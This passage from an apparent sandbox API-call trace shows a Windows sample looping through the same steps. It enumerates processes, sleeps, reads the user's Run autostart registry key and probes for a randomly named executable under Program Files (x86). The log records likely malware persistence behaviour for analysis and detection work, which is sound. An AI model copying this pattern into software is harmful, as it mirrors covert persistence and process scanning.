(in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.467] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.469] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.470] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.470] NtClose (Handle=0x338) returned 0x0 [0298.470] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.470] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.470] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0298.470] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.470] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.470] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0298.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.571] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.573] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.573] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.574] NtClose (Handle=0x338) returned 0x0 [0298.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.574] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.574] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0298.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.574] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.574] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0298.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.675] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.677] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.677] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.677] NtClose (Handle=0x338) returned 0x0 [0298.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.677] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.677] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0298.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.677] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.677] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0298.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.778] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.780] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.781] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.781] NtClose (Handle=0x338) returned 0x0 [0298.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.782] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.782] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0298.782] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.782] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.782] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0298.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0298.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0298.903] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0298.905] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0298.905] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0298.906] NtClose (Handle=0x338) returned 0x0 [0298.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.906] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.906] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dde20) returned 1 [0298.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.906] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0298.906] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0298.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0298.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0298.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0298.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0298.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.040] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.041] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.041] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.042] NtClose (Handle=0x338) returned 0x0 [0299.042] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.042] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.042] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0299.042] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.042] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.042] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0299.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.151] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.152] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.153] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.153] NtClose (Handle=0x338) returned 0x0 [0299.153] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.153] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.154] RtlFreeHeap 